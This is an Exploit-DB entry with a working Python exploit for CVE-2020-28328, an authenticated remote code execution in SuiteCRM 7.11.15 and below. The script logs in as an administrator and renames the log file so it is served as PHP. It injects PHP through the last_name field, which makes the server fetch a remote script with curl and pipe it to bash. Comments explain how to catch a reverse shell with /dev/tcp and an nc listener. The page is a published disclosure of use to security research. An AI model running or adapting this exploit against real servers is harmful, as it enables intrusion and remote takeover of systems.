SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)

EDB-ID:

49001




Platform:

PHP

Date:

2020-11-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
# Date: 08 NOV 2020
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://github.com/salesagility/SuiteCRM
# Version: 7.11.15 and below
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2020-28328
# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE

from requests import Session
from random import choice
from string import ascii_lowercase

url = "http://127.0.0.1/"  # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin"  # User must be an administrator
password = "admin"
prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
    prefix=prefix,
    rand=''.join(choice(ascii_lowercase) for _ in range(6))
)

# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name)

# Admin login payload
login_data = {
    "module": "Users",
    "action": "Authenticate",
    "return_module": "Users",
    "return_action": "Login",
    "user_name": user_name,
    "username_password": password,
    "Login": "Log+In"
}

# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
    "action": (None, "SaveConfig"),
    "module": (None, "Configurator"),
    "logger_file_name": (None, file_name),  # Set file extension in the file name as it isn't checked here
    "logger_file_ext": (None, ''),  # Bypasses file extension check by just not setting one.
    "logger_level": (None, "info"),  # This is important for your php code to make it into the logs
    "save": (None, "Save")
}

# Payload to put php code into the malicious log file
poison_log = {
    "module": (None, "Users"),
    "record": (None, "1"),
    "action": (None, "Save"),
    "page": (None, "EditView"),
    "return_action": (None, "DetailView"),
    "user_name": (None, user_name),
    "last_name": (None, command),
}

# Payload to restore the log file settings to default after the exploit runs
restore_log = {
    "action": (None, "SaveConfig"),
    "module": (None, "Configurator"),
    "logger_file_name": (None, "suitecrm"),  # Default log file name
    "logger_file_ext": (None, ".log"),  # Default log file extension
    "logger_level": (None, "fatal"),  # Default log file setting
    "save": (None, "Save")
}

# Start of exploit
with Session() as s:

    # Authenticating as the administrator
    s.get(post_url, params={'module': 'Users', 'action': 'Login'})
    print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
    s.post(post_url, data=login_data)
    if 'ck_login_id_20' not in s.cookies.get_dict().keys():
        print('[-] Invalid password for: {user}'.format(user=user_name))
        exit(1)
    print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
        user=user_name,
        cookie=s.cookies.get_dict()['PHPSESSID'])
    )

    # Modify the system settings to set logging to 'info' and create a log file in php format
    print('[+] Modifying log level and log file name.')
    print('[+] File name will be: {fname}'.format(fname=file_name))
    settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
    s.post(post_url, headers=settings_header, files=modify_system_settings_data)

    # Post to update the administrator's last name with php code that will poison the log file
    print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
    command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
    s.post(url, headers=command_header, files=poison_log)

    # May be a good idea to put a short delay in here to allow your code to make it into the logfile.
    # Up to you though...

    # Do a get request to trigger php code execution.
    print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
    execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
    if not execute_command.ok:
        print('[-] Exploit failed, sorry... Might have to do some modifications.')

    # Restoring log file to default
    print('[+] Setting log back to defaults')
    s.post(post_url, headers=settings_header, files=restore_log)

print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))